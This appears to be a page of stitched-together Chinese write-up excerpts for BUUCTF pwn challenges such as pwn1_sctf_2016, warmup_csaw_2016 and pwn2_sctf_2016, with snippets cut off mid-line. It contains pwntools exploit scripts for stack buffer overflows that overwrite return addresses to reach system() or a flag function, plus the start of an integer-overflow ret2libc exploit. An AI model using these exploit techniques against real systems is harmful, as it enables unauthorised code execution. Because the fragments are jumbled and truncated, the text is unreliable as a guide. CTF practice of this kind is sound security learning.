Buuctf 刷题笔记(PWN)(1) pwn1_sctf_2016 1、先使用checksec检查安全选项、再用IDA进行反编译 找到get_flag() 那么这道题可能就是ret2text类型了,直接利用栈溢出到返回地址进行覆盖,进而执行get_flag()就可以了 vuln()函数将我们的输入
gdb-peda$ pattern offset IAAeAA4AAJAAf 4|1编写exp frompwnimport*p = remote('node3.buuoj.cn',25333)payload =b'x'*72+ p64(0x40060d)p.sendline(payload)p.interactive() 运行exp脚本得到: 4|2得到flag flag{10d21dd6-9b91-45de-bf83-e01e0083d45e} 5|0⭐pwn1_sctf_2016 【题目链接】 ...
from pwnimport*p=remote('node4.buuoj.cn',29370)#p=process('./pwn1')payload=b'a'*(15+8)+p64(0x401187)#payload=b'a'*(15+8)+p64(0x40118a)#payload=b'a'*(15+8)+p64(0x401185)+p64(0x401186)#payload=b'a'*(15+8)+p64(0x401185)+p64(0x401198)+p64(0x401185)+p64(0x...
system_addr=0x0401187payload=flat('A'*15,0,system_addr)cn.sendline(payload)cn.interactive() 主要是2.27的system多了一个movaps需要对齐rsp warmup_csaw_2016 先checksec一下文件 反编译一下 sub_40060D就是一个system地址所以只要跳过去就好了 感觉比上一个简单 这次学乖了多了一个1 pwn1_sctf_2016 32...
NO.24 pwn2_sctf_2016 _sovle exp #-*- coding:utf-8-*- from pwn import * from LibcSearcher import * context(os="linux", arch="amd64", log_level="debug") local = 0 if local: p = process('./pwn2_sctf_2016') else: p = remote('node3.buuoj.cn',26427) elf = ELF('pwn2_...
pwn1_sctf_2016 IDA分析程序流程,发现程序只可以输入32个字符,而溢出点却要0x3c+4的大小 在往下看,会发现如果用户输入“I”的话会被转换位“you”,也就是说一个“I”占三位,那么0x3c+4/3=21,只要输入21个“I”在加上随便一个字符串,就可以造成溢出。
BUUCTFPWN部分题⽬wp pwn好难啊 PWN 1,连上就有flag的pwn nc buuoj.cn 6000得到flag 2,RIP覆盖⼀下 ⽤ida分析⼀下,发现已有了system,只需覆盖RIP为fun()的地址,⽤peda计算偏移为23,写脚本 from pwn import* sh=remote('f.buuoj.cn',6001)payload='a'*23+p64(0x401186)sh.sendline(...
pwn2_sctf_2016 整数溢出 第一次输入长度不超过四位的整数,在get_n函数中对输入的数字做出了限制,一个一个读入数字,且不能是'\0' 第一次输入的数字不能大于32,这显然不够溢出,但是可以注意到,get_n函数第二个实参v2是有符号的,而在函数中转变成无符号类型 get_n的第二个形参a2是无符号整型,并且它没有...
from pwn import * #p = process('./pwn') p = remote('node3.buuoj.cn', 29919) e = ELF('./pwn') payload1 = '\0' + b'a' * 6 + '\xff' p.sendline(payload1) p.recvuntil('Correct\n') #libc = ELF('/lib/i386-linux-gnu/libc.so.6') libc = ELF('libc-2.23.so') write...
004.ciscn_2019_n_1 005.pwn1_sctf_2016 006.jarvisoj_level0 007.ciscn_2019_c_1 008.[第五空间2019 决赛]PWN5 009.ciscn_2019_n_8 010.jarvisoj_level2 011.[OGeek2019]babyrop 012.get_started_3dsctf_2016 013.bjdctf_2020_babystack